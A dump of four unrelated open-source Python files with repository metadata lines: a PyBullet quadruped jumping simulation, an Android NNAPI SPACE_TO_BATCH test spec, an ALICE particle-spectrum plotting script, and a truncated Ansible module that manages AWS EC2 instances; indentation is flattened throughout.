print("localInertiaDiagonal", localInertiaDiagonal)
#this is a no-op, just to show the API
p.changeDynamics(quadruped, -1, localInertiaDiagonal=localInertiaDiagonal)
#for i in range (nJoints):
# p.changeDynamics(quadruped,i,localInertiaDiagonal=[0.000001,0.000001,0.000001])
drawInertiaBox(quadruped, -1, [1, 0, 0])
#drawInertiaBox(quadruped,motor_front_rightR_joint, [1,0,0])
for i in range(nJoints):
drawInertiaBox(quadruped, i, [0, 1, 0])
if (useMaximalCoordinates):
steps = 400
for aa in range(steps):
p.setJointMotorControl2(quadruped, motor_front_leftL_joint, p.POSITION_CONTROL,
motordir[0] * halfpi * float(aa) / steps)
p.setJointMotorControl2(quadruped, motor_front_leftR_joint, p.POSITION_CONTROL,
motordir[1] * halfpi * float(aa) / steps)
p.setJointMotorControl2(quadruped, motor_back_leftL_joint, p.POSITION_CONTROL,
motordir[2] * halfpi * float(aa) / steps)
p.setJointMotorControl2(quadruped, motor_back_leftR_joint, p.POSITION_CONTROL,
motordir[3] * halfpi * float(aa) / steps)
p.setJointMotorControl2(quadruped, motor_front_rightL_joint, p.POSITION_CONTROL,
motordir[4] * halfpi * float(aa) / steps)
p.setJointMotorControl2(quadruped, motor_front_rightR_joint, p.POSITION_CONTROL,
motordir[5] * halfpi * float(aa) / steps)
p.setJointMotorControl2(quadruped, motor_back_rightL_joint, p.POSITION_CONTROL,
motordir[6] * halfpi * float(aa) / steps)
p.setJointMotorControl2(quadruped, motor_back_rightR_joint, p.POSITION_CONTROL,
motordir[7] * halfpi * float(aa) / steps)
p.setJointMotorControl2(quadruped, knee_front_leftL_link, p.POSITION_CONTROL,
motordir[0] * (kneeangle + twopi) * float(aa) / steps)
p.setJointMotorControl2(quadruped, knee_front_leftR_link, p.POSITION_CONTROL,
motordir[1] * kneeangle * float(aa) / steps)
p.setJointMotorControl2(quadruped, knee_back_leftL_link, p.POSITION_CONTROL,
motordir[2] * kneeangle * float(aa) / steps)
p.setJointMotorControl2(quadruped, knee_back_leftR_link, p.POSITION_CONTROL,
motordir[3] * (kneeangle + twopi) * float(aa) / steps)
p.setJointMotorControl2(quadruped, knee_front_rightL_link, p.POSITION_CONTROL,
motordir[4] * (kneeangle) * float(aa) / steps)
p.setJointMotorControl2(quadruped, knee_front_rightR_link, p.POSITION_CONTROL,
motordir[5] * (kneeangle + twopi) * float(aa) / steps)
p.setJointMotorControl2(quadruped, knee_back_rightL_link, p.POSITION_CONTROL,
motordir[6] * (kneeangle + twopi) * float(aa) / steps)
p.setJointMotorControl2(quadruped, knee_back_rightR_link, p.POSITION_CONTROL,
motordir[7] * kneeangle * float(aa) / steps)
p.stepSimulation()
#time.sleep(fixedTimeStep)
else:
p.resetJointState(quadruped, motor_front_leftL_joint, motordir[0] * halfpi)
p.resetJointState(quadruped, knee_front_leftL_link, motordir[0] * kneeangle)
p.resetJointState(quadruped, motor_front_leftR_joint, motordir[1] * halfpi)
p.resetJointState(quadruped, knee_front_leftR_link, motordir[1] * kneeangle)
p.resetJointState(quadruped, motor_back_leftL_joint, motordir[2] * halfpi)
p.resetJointState(quadruped, knee_back_leftL_link, motordir[2] * kneeangle)
p.resetJointState(quadruped, motor_back_leftR_joint, motordir[3] * halfpi)
p.resetJointState(quadruped, knee_back_leftR_link, motordir[3] * kneeangle)
p.resetJointState(quadruped, motor_front_rightL_joint, motordir[4] * halfpi)
p.resetJointState(quadruped, knee_front_rightL_link, motordir[4] * kneeangle)
p.resetJointState(quadruped, motor_front_rightR_joint, motordir[5] * halfpi)
p.resetJointState(quadruped, knee_front_rightR_link, motordir[5] * kneeangle)
p.resetJointState(quadruped, motor_back_rightL_joint, motordir[6] * halfpi)
p.resetJointState(quadruped, knee_back_rightL_link, motordir[6] * kneeangle)
p.resetJointState(quadruped, motor_back_rightR_joint, motordir[7] * halfpi)
p.resetJointState(quadruped, knee_back_rightR_link, motordir[7] * kneeangle)
#p.getNumJoints(1)
if (toeConstraint):
cid = p.createConstraint(quadruped, knee_front_leftR_link, quadruped, knee_front_leftL_link,
p.JOINT_POINT2POINT, [0, 0, 0], [0, 0.005, 0.1], [0, 0.01, 0.1])
p.changeConstraint(cid, maxForce=maxKneeForce)
cid = p.createConstraint(quadruped, knee_front_rightR_link, quadruped, knee_front_rightL_link,
p.JOINT_POINT2POINT, [0, 0, 0], [0, 0.005, 0.1], [0, 0.01, 0.1])
p.changeConstraint(cid, maxForce=maxKneeForce)
cid = p.createConstraint(quadruped, knee_back_leftR_link, quadruped, knee_back_leftL_link,
p.JOINT_POINT2POINT, [0, 0, 0], [0, 0.005, 0.1], [0, 0.01, 0.1])
p.changeConstraint(cid, maxForce=maxKneeForce)
cid = p.createConstraint(quadruped, knee_back_rightR_link, quadruped, knee_back_rightL_link,
p.JOINT_POINT2POINT, [0, 0, 0], [0, 0.005, 0.1], [0, 0.01, 0.1])
p.changeConstraint(cid, maxForce=maxKneeForce)
if (1):
p.setJointMotorControl(quadruped, knee_front_leftL_link, p.VELOCITY_CONTROL, 0,
kneeFrictionForce)
p.setJointMotorControl(quadruped, knee_front_leftR_link, p.VELOCITY_CONTROL, 0,
kneeFrictionForce)
p.setJointMotorControl(quadruped, knee_front_rightL_link, p.VELOCITY_CONTROL, 0,
kneeFrictionForce)
p.setJointMotorControl(quadruped, knee_front_rightR_link, p.VELOCITY_CONTROL, 0,
kneeFrictionForce)
p.setJointMotorControl(quadruped, knee_back_leftL_link, p.VELOCITY_CONTROL, 0, kneeFrictionForce)
p.setJointMotorControl(quadruped, knee_back_leftR_link, p.VELOCITY_CONTROL, 0, kneeFrictionForce)
p.setJointMotorControl(quadruped, knee_back_leftL_link, p.VELOCITY_CONTROL, 0, kneeFrictionForce)
p.setJointMotorControl(quadruped, knee_back_leftR_link, p.VELOCITY_CONTROL, 0, kneeFrictionForce)
p.setJointMotorControl(quadruped, knee_back_rightL_link, p.VELOCITY_CONTROL, 0,
kneeFrictionForce)
p.setJointMotorControl(quadruped, knee_back_rightR_link, p.VELOCITY_CONTROL, 0,
kneeFrictionForce)
p.setGravity(0, 0, -10)
legnumbering = [
motor_front_leftL_joint, motor_front_leftR_joint, motor_back_leftL_joint,
motor_back_leftR_joint, motor_front_rightL_joint, motor_front_rightR_joint,
motor_back_rightL_joint, motor_back_rightR_joint
]
for i in range(8):
print(legnumbering[i])
#use the Minitaur leg numbering
p.setJointMotorControl2(bodyIndex=quadruped,
jointIndex=legnumbering[0],
controlMode=p.POSITION_CONTROL,
targetPosition=motordir[0] * 1.57,
positionGain=kp,
velocityGain=kd,
force=maxForce)
p.setJointMotorControl2(bodyIndex=quadruped,
jointIndex=legnumbering[1],
controlMode=p.POSITION_CONTROL,
targetPosition=motordir[1] * 1.57,
positionGain=kp,
velocityGain=kd,
force=maxForce)
p.setJointMotorControl2(bodyIndex=quadruped,
jointIndex=legnumbering[2],
controlMode=p.POSITION_CONTROL,
targetPosition=motordir[2] * 1.57,
positionGain=kp,
velocityGain=kd,
force=maxForce)
p.setJointMotorControl2(bodyIndex=quadruped,
jointIndex=legnumbering[3],
controlMode=p.POSITION_CONTROL,
targetPosition=motordir[3] * 1.57,
positionGain=kp,
velocityGain=kd,
force=maxForce)
p.setJointMotorControl2(bodyIndex=quadruped,
jointIndex=legnumbering[4],
controlMode=p.POSITION_CONTROL,
targetPosition=motordir[4] * 1.57,
positionGain=kp,
velocityGain=kd,
force=maxForce)
p.setJointMotorControl2(bodyIndex=quadruped,
jointIndex=legnumbering[5],
controlMode=p.POSITION_CONTROL,
targetPosition=motordir[5] * 1.57,
positionGain=kp,
velocityGain=kd,
force=maxForce)
p.setJointMotorControl2(bodyIndex=quadruped,
jointIndex=legnumbering[6],
controlMode=p.POSITION_CONTROL,
targetPosition=motordir[6] * 1.57,
positionGain=kp,
velocityGain=kd,
force=maxForce)
p.setJointMotorControl2(bodyIndex=quadruped,
jointIndex=legnumbering[7],
controlMode=p.POSITION_CONTROL,
targetPosition=motordir[7] * 1.57,
positionGain=kp,
velocityGain=kd,
force=maxForce)
#stand still
p.setRealTimeSimulation(useRealTime)
t = 0.0
t_end = t + 15
ref_time = time.time()
while (t < t_end):
p.setGravity(0, 0, -10)
if (useRealTime):
t = time.time() - ref_time
else:
t = t + fixedTimeStep
if (useRealTime == 0):
p.stepSimulation()
time.sleep(fixedTimeStep)
print("quadruped Id = ")
print(quadruped)
p.saveWorld("quadru.py")
logId = p.startStateLogging(p.STATE_LOGGING_MINITAUR, "quadrupedLog.bin", [quadruped])
#jump
t = 0.0
t_end = t + 100
i = 0
ref_time = time.time()
while (1):
if (useRealTime):
t = time.time() - ref_time
else:
t = t + fixedTimeStep
if (True):
target = math.sin(t * speed) * jump_amp + 1.57
p.setJointMotorControl2(bodyIndex=quadruped,
jointIndex=legnumbering[0],
controlMode=p.POSITION_CONTROL,
targetPosition=motordir[0] * target,
positionGain=kp,
velocityGain=kd,
force=maxForce)
p.setJointMotorControl2(bodyIndex=quadruped,
jointIndex=legnumbering[1],
controlMode=p.POSITION_CONTROL,
targetPosition=motordir[1] * target,
positionGain=kp,
velocityGain=kd,
force=maxForce)
p.setJointMotorControl2(bodyIndex=quadruped,
jointIndex=legnumbering[2],
controlMode=p.POSITION_CONTROL,
targetPosition=motordir[2] * target,
positionGain=kp,
velocityGain=kd,
force=maxForce)
p.setJointMotorControl2(bodyIndex=quadruped,
jointIndex=legnumbering[3],
controlMode=p.POSITION_CONTROL,
targetPosition=motordir[3] * target,
positionGain=kp,
velocityGain=kd,
force=maxForce)
p.setJointMotorControl2(bodyIndex=quadruped,
jointIndex=legnumbering[4],
controlMode=p.POSITION_CONTROL,
targetPosition=motordir[4] * target,
positionGain=kp,
velocityGain=kd,
force=maxForce)
p.setJointMotorControl2(bodyIndex=quadruped,
jointIndex=legnumbering[5],
controlMode=p.POSITION_CONTROL,
targetPosition=motordir[5] * target,
positionGain=kp,
velocityGain=kd,
force=maxForce)
p.setJointMotorControl2(bodyIndex=quadruped,
jointIndex=legnumbering[6],
controlMode=p.POSITION_CONTROL,
targetPosition=motordir[6] * target,
positionGain=kp,
velocityGain=kd,
force=maxForce)
p.setJointMotorControl2(bodyIndex=quadruped,
jointIndex=legnumbering[7],
controlMode=p.POSITION_CONTROL,
targetPosition=motordir[7] * target,
positionGain=kp,
velocityGain=kd,
force=maxForce)
if (useRealTime == 0):
p.stepSimulation()
time.sleep(fixedTimeStep)
|
tests/nnapi/specs/skip/V1_2/space_to_batch_v1_2.mod.py | periannath/ONE | 255 | 29884 | <filename>tests/nnapi/specs/skip/V1_2/space_to_batch_v1_2.mod.py
#
# Copyright (C) 2018 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
layout = BoolScalar("layout", False) # NHWC
# TEST 1: SPACE_TO_BATCH_NCHW_1, block_size = [2, 2]
i1 = Input("op1", "TENSOR_FLOAT32", "{1, 2, 2, 2}")
pad1 = Parameter("paddings", "TENSOR_INT32", "{2, 2}", [0, 0, 0, 0])
o1 = Output("op4", "TENSOR_FLOAT32", "{4, 1, 1, 2}")
Model().Operation("SPACE_TO_BATCH_ND", i1, [2, 2], pad1, layout).To(o1)
# Additional data type
quant8 = DataTypeConverter().Identify({
i1: ("TENSOR_QUANT8_ASYMM", 0.1, 0),
o1: ("TENSOR_QUANT8_ASYMM", 0.1, 0)
})
# Instantiate an example
example = Example({
i1: [1.4, 2.3, 3.2, 4.1, 5.4, 6.3, 7.2, 8.1],
o1: [1.4, 2.3, 3.2, 4.1, 5.4, 6.3, 7.2, 8.1]
}).AddNchw(i1, o1, layout).AddVariations("relaxed", "float16", quant8)
# TEST 2: SPACE_TO_BATCH_NCHW_2, block_size = [2, 2]
i2 = Input("op1", "TENSOR_FLOAT32", "{1, 4, 4, 1}")
o2 = Output("op4", "TENSOR_FLOAT32", "{4, 2, 2, 1}")
Model().Operation("SPACE_TO_BATCH_ND", i2, [2, 2], pad1, layout).To(o2)
# Additional data type
quant8 = DataTypeConverter().Identify({
i2: ("TENSOR_QUANT8_ASYMM", 0.5, 0),
o2: ("TENSOR_QUANT8_ASYMM", 0.5, 0)
})
# Instantiate an example
example = Example({
i2: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16],
o2: [1, 3, 9, 11, 2, 4, 10, 12, 5, 7, 13, 15, 6, 8, 14, 16]
}).AddNchw(i2, o2, layout).AddVariations("relaxed", "float16", quant8)
# TEST 3: SPACE_TO_BATCH_NCHW_3, block_size = [3, 2]
i3 = Input("op1", "TENSOR_FLOAT32", "{1, 5, 2, 1}")
pad3 = Parameter("paddings", "TENSOR_INT32", "{2, 2}", [1, 0, 2, 0])
o3 = Output("op4", "TENSOR_FLOAT32", "{6, 2, 2, 1}")
Model().Operation("SPACE_TO_BATCH_ND", i3, [3, 2], pad3, layout).To(o3)
# Additional data type
quant8 = DataTypeConverter().Identify({
i3: ("TENSOR_QUANT8_ASYMM", 0.5, 128),
o3: ("TENSOR_QUANT8_ASYMM", 0.5, 128)
})
# Instantiate an example
example = Example({
i3: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10],
o3: [0, 0, 0, 5, 0, 0, 0, 6, 0, 1, 0, 7,
0, 2, 0, 8, 0, 3, 0, 9, 0, 4, 0, 10]
}).AddNchw(i3, o3, layout).AddVariations("relaxed", "float16", quant8)
# TEST 4: SPACE_TO_BATCH_NCHW_4, block_size = [3, 2]
i4 = Input("op1", "TENSOR_FLOAT32", "{1, 4, 2, 1}")
pad4 = Parameter("paddings", "TENSOR_INT32", "{2, 2}", [1, 1, 2, 4])
o4 = Output("op4", "TENSOR_FLOAT32", "{6, 2, 4, 1}")
Model().Operation("SPACE_TO_BATCH_ND", i4, [3, 2], pad4, layout).To(o4)
# Additional data type
quant8 = DataTypeConverter().Identify({
i4: ("TENSOR_QUANT8_ASYMM", 0.25, 128),
o4: ("TENSOR_QUANT8_ASYMM", 0.25, 128)
})
# Instantiate an example
example = Example({
i4: [1, 2, 3, 4, 5, 6, 7, 8],
o4: [0, 0, 0, 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 6, 0, 0,
0, 1, 0, 0, 0, 7, 0, 0, 0, 2, 0, 0, 0, 8, 0, 0,
0, 3, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0]
}).AddNchw(i4, o4, layout).AddVariations("relaxed", "float16", quant8)
|
PWGJE/EMCALJetTasks/Tracks/analysis/old/ComparePeriodsTriggerToMB.py | maroozm/AliPhysics | 114 | 29894 | <filename>PWGJE/EMCALJetTasks/Tracks/analysis/old/ComparePeriodsTriggerToMB.py<gh_stars>100-1000
#! /usr/bin/env python
from ROOT import TCanvas, TGraphErrors, TLegend, TPaveText
from ROOT import kBlack, kBlue, kRed
from Helper import Frame, ReadHistList
from Graphics import Style
from SpectrumContainer import DataContainer
from copy import deepcopy
class PeriodComparisonPlot:
def __init__(self):
self.__comparisons = []
self.__canvas = None
self.__frames = {}
self.__legend = None
def AddComparison(self, comp):
self.__comparisons.append(comp)
def SetPlotRange(self, min ,max):
for comp in self.__comparisons:
comp.SetPlotRange(min, max)
def Draw(self):
self.__canvas = TCanvas("comparison%s" %(self.__comparisons[0].GetTriggerName()), "Comparison of different periods for trigger %s" %(self.__comparisons[0].GetTriggerName()), 1000, 600)
self.__canvas.Divide(2,1)
self.__legend = TLegend(0.15, 0.15, 0.45, 0.45)
self.__legend.SetBorderSize(0)
self.__legend.SetFillStyle(0)
self.__legend.SetTextFont(42)
specpad = self.__canvas.cd(1)
specpad.SetGrid(False,False)
specpad.SetLogx(True)
specpad.SetLogy(True)
self.__frames["Spectra"] = Frame("axisSpec%s" %(self.__comparisons[0].GetTriggerName()), 0, 100, 1e-10, 100)
self.__frames["Spectra"].SetXtitle("p_{t} (GeV/c)")
self.__frames["Spectra"].SetYtitle("1/N_{event} 1/(#Delta p_{t}) dN/dp_{t} ((GeV/c)^{-2})")
self.__frames["Spectra"].Draw()
self.__comparisons[0].DrawMinBiasSpectrum()
self.__comparisons[0].AddMBtoLegend(self.__legend)
for comp in sorted(self.__comparisons):
comp.DrawTriggeredSpectrum()
comp.AddTriggeredSpectrumToLegend(self.__legend)
self.__legend.Draw()
self.__label = self.__comparisons[0].CreateLabel(0.5, 0.75, 0.89, 0.85)
self.__label.Draw()
rpad = self.__canvas.cd(2)
rpad.SetGrid(False, False)
self.__frames["Ratios"] = Frame("axisRatio%s" %(self.__comparisons[0].GetTriggerName()), 0, 100, 0, 2000)
self.__frames["Ratios"].SetXtitle("p_{t} (GeV/c)")
self.__frames["Ratios"].SetYtitle("%s / Min. Bias" %(self.__comparisons[0].GetTriggerName()))
self.__frames["Ratios"].Draw()
for comp in sorted(self.__comparisons):
comp.DrawRatioTriggeredMinBias()
self.__canvas.cd()
def SaveAs(self, filenamebase):
"""
Save plot as image file
"""
types = ["eps", "pdf", "jpeg", "gif", "png"]
for t in types:
self.__canvas.SaveAs("%s.%s" %(filenamebase, t))
class TriggerComparison:
def __init__(self, trgspec, mbspec, triggername, dataname):
self.__triggeredspectrum = trgspec
self.__minbiasspectrum = mbspec
self.__ratiospectra = self.__triggeredspectrum.MakeRatio(self.__minbiasspectrum)
self.__ratiospectra.SetStyle(self.__triggeredspectrum.GetStyle())
self.__triggername = triggername
self.__dataname = dataname
def __cmp__(self, other):
othername = other.GetDataName()
if self.__dataname == othername:
return 0
elif self.__dataname < othername:
return -1
else:
return 1
def SetPlotRange(self, min, max):
self.__triggeredspectrum.SetPlotRange(min, max)
self.__minbiasspectrum.SetPlotRange(min, max)
self.__ratiospectra.SetPlotRange(min, max)
def GetTriggerName(self):
return self.__triggername
def GetDataName(self):
return self.__dataname
def DrawTriggeredSpectrum(self):
self.__triggeredspectrum.Draw()
def DrawMinBiasSpectrum(self):
self.__minbiasspectrum.Draw()
def DrawRatioTriggeredMinBias(self):
self.__ratiospectra.Draw()
def AddMBtoLegend(self, leg):
self.__minbiasspectrum.AddToLegend(leg, "MinBias")
def AddTriggeredSpectrumToLegend(self, leg):
self.__triggeredspectrum.AddToLegend(leg, self.__dataname)
def CreateLabel(self, xmin, ymin, xmax, ymax):
label = TPaveText(xmin, ymin, xmax, ymax, "NDC")
label.SetBorderSize(0)
label.SetFillStyle(0)
label.SetTextFont(42)
label.AddText("Trigger: %s" %(self.__triggername))
return label
class GraphicsObject:
def __init__(self, data, name):
self._data = data
self._graphics = None
self._style = Style(kBlack, 20)
self._plotrange = {"Min":None, "Max":None}
self._name = name
def SetPlotRange(self, min, max):
self._plotrange[min] = min
self._plotrange[max] = max
def SetStyle(self, style):
self._style = style
def SetName(self, name):
self._name = name
def GetData(self):
return self._data
def GetGraphics(self):
return self._graphics
def GetStyle(self):
return self._style
def Draw(self):
if not self._graphics:
self._graphics = TGraphErrors()
np = 0
for bin in range(1, self._data.GetXaxis().GetNbins()+1):
if self._plotrange["Min"] and self._data.GetXaxis().GetBinLowEdge(bin) < self._plotrange["Min"]:
continue
if self._plotrange["Max"] and self._data.GetXaxis().GetBinUpEdge(bin) > self._plotrange["Max"]:
break
self._graphics.SetPoint(np, self._data.GetXaxis().GetBinCenter(bin), self._data.GetBinContent(bin))
self._graphics.SetPointError(np, self._data.GetXaxis().GetBinWidth(bin)/2., self._data.GetBinError(bin))
np = np + 1
self._graphics.SetMarkerColor(self._style.GetColor())
self._graphics.SetLineColor(self._style.GetColor())
self._graphics.SetMarkerStyle(self._style.GetMarker())
self._graphics.Draw("epsame")
def AddToLegend(self, legend, title = None):
if self._graphics:
tit = self._name
if title:
tit = title
legend.AddEntry(self._graphics, tit, "lep")
class Spectrum(GraphicsObject):
def __init__(self, data, name):
GraphicsObject.__init__(self, data, name)
def MakeRatio(self, denominator):
result = deepcopy(self._data)
result.Divide(denominator.GetData())
ratio = Ratio(result)
if self._plotrange["Min"] or self._plotrange["Max"]:
ratio.SetPlotRange(self._plotrange["Min"], self._plotrange["Max"])
return ratio
class Ratio(GraphicsObject):
def __init__(self, data, name = None):
GraphicsObject.__init__(self, data, name)
def ReadSpectra(filename, trigger):
"""
Read the spectra for different trigger classes from the root file
Returns a dictionary of triggers - spectrum container
"""
hlist = ReadHistList(filename, "PtEMCalTriggerTask")
return DataContainer(eventHist = hlist.FindObject("hEventHist%s" %(trigger)), trackHist = hlist.FindObject("hTrackHist%s" %(trigger)))
def MakeNormalisedSpectrum(inputdata, name):
"""
Normalise spectrum by the number of events and by the bin width
"""
inputdata.SetVertexRange(-10., 10.)
inputdata.SetPileupRejection(True)
inputdata.SelectTrackCuts(1)
return inputdata.MakeProjection(0, "ptSpectrum%s" %(name), "p_{t} (GeV/c)", "1/N_{event} 1/(#Delta p_{t}) dN/dp_{t} ((GeV/c)^{-2})")
def ComparePeriods(filea, fileb, filemb, namea, nameb, trigger):
triggers = {}
dataA = ReadSpectra(filea, trigger)
dataB = ReadSpectra(fileb, trigger)
dataMB = ReadSpectra(filemb, "MinBias")
specA = Spectrum(MakeNormalisedSpectrum(dataA, namea), namea)
specA.SetStyle(Style(kBlue, 24))
specB = Spectrum(MakeNormalisedSpectrum(dataB, nameb), nameb)
specB.SetStyle(Style(kRed, 25))
specMB = Spectrum(MakeNormalisedSpectrum(dataMB, "MinBias"), "MinBias")
specMB.SetStyle(Style(kBlack, 25))
plot = PeriodComparisonPlot()
plot.AddComparison(TriggerComparison(specA, specMB, trigger, namea))
plot.AddComparison(TriggerComparison(specB, specMB, trigger, nameb))
plot.SetPlotRange(2., 100.)
plot.Draw()
return plot
|
pool_automation/roles/aws_manage/library/stateful_set.py | Rob-S/indy-node | 627 | 29927 | <gh_stars>100-1000
#!/usr/bin/python
import re
from itertools import cycle
from collections import namedtuple, defaultdict, OrderedDict
import boto3
from ansible.module_utils.basic import AnsibleModule
# import logging
# boto3.set_stream_logger('', logging.DEBUG)
HostInfo = namedtuple('HostInfo', 'tag_id public_ip user')
InstanceParams = namedtuple(
'InstanceParams',
'project namespace group add_tags key_name security_group '
'type_name market_spot spot_max_price ebs_volume_size ebs_volume_type')
ManageResults = namedtuple('ManageResults', 'changed active terminated')
class AWSRegion(object):
def __init__(self, code, location, expensive=False):
self.code = code
self.location = location
self.expensive = expensive
# https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-regions-availability-zones.html
#
# prices:
# - https://aws.amazon.com/ec2/pricing/
# - https://www.concurrencylabs.com/blog/choose-your-aws-region-wisely/
#
# TODO automate or update periodically
AWS_REGIONS = OrderedDict([(r.code, r) for r in [
AWSRegion('us-east-1', 'US East (N. Virginia)'),
AWSRegion('us-east-2', 'US East (Ohio)'),
AWSRegion('us-west-1', 'US West (N. California)'),
AWSRegion('us-west-2', 'US West (Oregon)'),
AWSRegion('ca-central-1', 'Canada (Central)'),
AWSRegion('eu-central-1', 'EU (Frankfurt)'),
AWSRegion('eu-west-1', 'EU (Ireland)'),
AWSRegion('eu-west-2', 'EU (London)'),
AWSRegion('eu-west-3', 'EU (Paris)'),
AWSRegion('ap-northeast-1', 'Asia Pacific (Tokyo)'),
AWSRegion('ap-northeast-2', 'Asia Pacific (Seoul)'),
# some specific one, requires service subscriptions
# (ClientError: An error occurred (OptInRequired) when calling the DescribeInstances operation)
# AWSRegion('ap-northeast-3', 'Asia Pacific (Osaka-Local)'),
AWSRegion('ap-southeast-1', 'Asia Pacific (Singapore)'),
AWSRegion('ap-southeast-2', 'Asia Pacific (Sydney)'),
AWSRegion('ap-south-1', 'Asia Pacific (Mumbai)'),
AWSRegion('sa-east-1', 'South America (Sao Paulo)', True),
]])
# TODO
# - think about moving these module level funcitons into classes
# - cache results
def find_ubuntu_ami(ec2):
images = ec2.images.filter(
Owners=['099720109477'],
Filters=[
{
'Name': 'name',
'Values': ['ubuntu/images/hvm-ssd/ubuntu-xenial-16.04-amd64-server*']
}
])
# Return latest image available
images = sorted(images, key=lambda v: v.creation_date)
return images[-1].image_id if len(images) > 0 else None
def find_instances(ec2, project, namespace, group=None):
filters = [
{'Name': 'tag:Project', 'Values': [project]},
{'Name': 'tag:Namespace', 'Values': [namespace]}
]
if group is not None:
filters.append({'Name': 'tag:Group', 'Values': [group]})
return [instance for instance in ec2.instances.filter(Filters=filters)
if instance.state['Name'] not in ['terminated', 'shutting-down']]
def valid_instances(regions, count):
result = defaultdict(list)
for i, region in zip(range(count), cycle(regions)):
result[region].append(str(i + 1))
return result
def get_tag(obj, name):
for tag in obj.tags:
if tag['Key'] == name:
return tag['Value']
return None
class AwsEC2Waiter(object):
""" Base class for EC2 actors which calls long running async actions. """
def __init__(self, ev_name):
self._awaited = defaultdict(list)
self._ev_name = ev_name
@property
def awaited(self):
return dict(self._awaited)
def _instance_region(self, instance):
# TODO more mature would be to use
# ec2.client.describe_availability_zones
# and create a map av.zone -> region
return instance.placement['AvailabilityZone'][:-1]
def add_instance(self, instance, region=None):
# fallback - autodetect placement region,
# might lead to additional AWS API calls
if not region:
region = self._instance_region(instance)
self._awaited[region].append(instance)
def wait(self, update=True):
for region, instances in dict(self._awaited).iteritems():
ec2cl = boto3.client('ec2', region_name=region)
ec2cl.get_waiter(self._ev_name).wait(
InstanceIds=[inst.id for inst in instances])
if update:
for inst in instances:
inst.reload()
del self._awaited[region]
class AwsEC2Terminator(AwsEC2Waiter):
""" Helper class to terminate EC2 instances. """
def __init__(self):
super(AwsEC2Terminator, self).__init__('instance_terminated')
def terminate(self, instance, region=None):
instance.terminate()
self.add_instance(instance, region)
# cancel spot request if any
if instance.spot_instance_request_id:
ec2cl = boto3.client('ec2', region_name=(region if region
else self._instance_region(instance)))
ec2cl.cancel_spot_instance_requests(
SpotInstanceRequestIds=[instance.spot_instance_request_id])
class AwsEC2Launcher(AwsEC2Waiter):
""" Helper class to launch EC2 instances. """
_camel_to_snake_re1 = re.compile('(.)([A-Z][a-z]+)')
_camel_to_snake_re2 = re.compile('([a-z0-9])([A-Z])')
def __init__(self):
# TODO consider to use waiter for 'instance_status_ok'
# if 'instance_running' is not enough in any circumstances
super(AwsEC2Launcher, self).__init__('instance_running')
@classmethod
def _camel_to_snake(cls, camel_one):
# borrowed from here:
# https://stackoverflow.com/questions/1175208/elegant-python-function-to-convert-camelcase-to-snake-case
return cls._camel_to_snake_re2.sub(
r'\1_\2', cls._camel_to_snake_re1.sub(r'\1_\2', camel_one)).lower()
def launch(self, params, count, region=None, ec2=None):
def _get_options(opts_list, prefix=''):
res = {}
for opt in opts_list:
_opt = prefix + self._camel_to_snake(opt)
if getattr(params, _opt) is not None:
res[opt] = getattr(params, _opt)
return res
if not ec2:
ec2 = boto3.resource('ec2', region_name=region)
spot_opts_list = (
'MaxPrice',
)
# Note: default value type depends on region for API calls
# https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/EBSVolumeTypes.html
ebs_opts_list = (
'VolumeSize',
'VolumeType',
)
launch_spec = {
'ImageId': find_ubuntu_ami(ec2),
'KeyName': params.key_name,
'SecurityGroups': [params.security_group],
'InstanceType': params.type_name,
'MinCount': count,
'MaxCount': count,
'TagSpecifications': [
{
'ResourceType': rc_type,
'Tags': [
{
'Key': 'Project',
'Value': params.project
},
{
'Key': 'Namespace',
'Value': params.namespace
},
{
'Key': 'Group',
'Value': params.group
}
] + [
{'Key': k, 'Value': v}
for k, v in params.add_tags.iteritems()
]
} for rc_type in ('instance', 'volume')
]
}
# ebs
ebs_options = _get_options(ebs_opts_list, 'ebs_')
if ebs_options:
launch_spec['BlockDeviceMappings'] = [{
'DeviceName': '/dev/sda1',
'Ebs': ebs_options
}]
# spot
if params.market_spot:
launch_spec['InstanceMarketOptions'] = {
'MarketType': 'spot',
'SpotOptions': _get_options(spot_opts_list, 'spot_')
}
# tags
instances = ec2.create_instances(**launch_spec)
for i in instances:
self.add_instance(i, region)
return instances
def manage_instances(regions, params, count):
hosts = []
terminated = []
tag_ids = []
changed = False
def _host_info(inst):
return HostInfo(
tag_id=get_tag(inst, 'ID'),
public_ip=inst.public_ip_address,
user='ubuntu')
aws_launcher = AwsEC2Launcher()
aws_terminator = AwsEC2Terminator()
valid_region_ids = valid_instances(regions, count)
for region in AWS_REGIONS.keys():
ec2 = boto3.resource('ec2', region_name=region)
valid_ids = valid_region_ids[region]
instances = find_instances(
ec2, params.project, params.namespace, params.group)
for inst in instances:
tag_id = get_tag(inst, 'ID')
if tag_id in valid_ids:
valid_ids.remove(tag_id)
hosts.append(inst)
aws_launcher.add_instance(inst, region)
else:
terminated.append(_host_info(inst))
aws_terminator.terminate(inst, region)
changed = True
if valid_ids:
instances = aws_launcher.launch(
params, len(valid_ids), region=region, ec2=ec2)
for inst, tag_id in zip(instances, valid_ids):
tag_ids.append((inst, tag_id))
hosts.append(inst)
changed = True
aws_launcher.wait()
# add tags based on id once instances are running
for inst, tag_id in tag_ids:
inst.create_tags(Tags=[
{'Key': 'Name', 'Value': "{}-{}-{}-{}"
.format(params.project,
params.namespace,
params.group,
tag_id.zfill(3)).lower()},
{'Key': 'ID', 'Value': tag_id}])
aws_terminator.wait()
return ManageResults(
changed,
[_host_info(inst) for inst in hosts],
terminated
)
def run(module):
params = module.params
inst_params = InstanceParams(
project=params['project'],
namespace=params['namespace'],
group=params['group'],
add_tags=params['add_tags'],
key_name=params['key_name'],
security_group=params['security_group'],
type_name=params['instance_type'],
market_spot=params['market_spot'],
spot_max_price=params['spot_max_price'],
ebs_volume_size=params['ebs_volume_size'],
ebs_volume_type=params['ebs_volume_type'],
)
res = manage_instances(
